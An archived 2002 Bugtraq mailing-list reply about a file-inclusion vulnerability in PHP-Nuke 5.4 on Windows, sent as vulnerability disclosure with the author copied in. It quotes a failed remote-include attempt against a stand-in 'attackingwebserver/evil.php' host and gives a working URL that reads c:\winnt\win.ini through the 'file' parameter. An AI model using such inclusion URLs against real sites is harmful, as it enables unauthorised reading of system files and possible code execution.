[23970] in bugtraq

home help back first fref pref prev next nref lref last post

Re: PHP-Nuke allows Command Execution & Much more

daemon@ATHENA.MIT.EDU (RoMaNSoFt)
Thu Jan 24 15:34:14 2002

From: RoMaNSoFt <roman@madrid.com>
To: Dave Ahmad <da@securityfocus.com>
Cc: bugtraq@securityfocus.com
Date: Thu, 24 Jan 2002 17:18:08 +0100
Message-ID: <4rc05u47avh66ohrrlc16uuuf31oret8pc@4ax.com>
In-Reply-To: <Pine.LNX.4.43.0201210948020.2108-100000@mail>
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 8bit

On Mon, 21 Jan 2002 09:48:16 -0700 (MST), you wrote:

>Roman,
>
>I'll approve the post you sent yesterday.

 Dave, I haven't seen my post in bugtraq. Perhaps did you forget it?
I've included the fixed version of the post so you can directly cc to
bugtraq, if you consider it appropiate. Cheers.

 --Rom.

------------------------

 Hi. I did some quick tests on a php-nuke running on Apache for
*Windows*. PHPNuke version I tested was 5.4 (which is the last release
of phpnuke at the time of testing). I couldn't reproduce your exploit.
I always get something like:

Warning: Failed opening 'http://attackingwebserver/evil.php' for
inclusion (include_path='') in c:\php\index.php on line 113

 Nevertheless I realized that this other URL works:
http://victimserver/index.php?file=c:\winnt\win.ini

 The former exploit shows the contens of win.ini file. At least it
worked for me :-)

 Since phpnuke  tested version is the last version at the time of
writing, I cc'ed this to Francisco Burzi (phpnuke author) 'cause it
seems like new stuff. This happened during last week.

Greetz,
 --RoMaNSoFt


home help back first fref pref prev next nref lref last post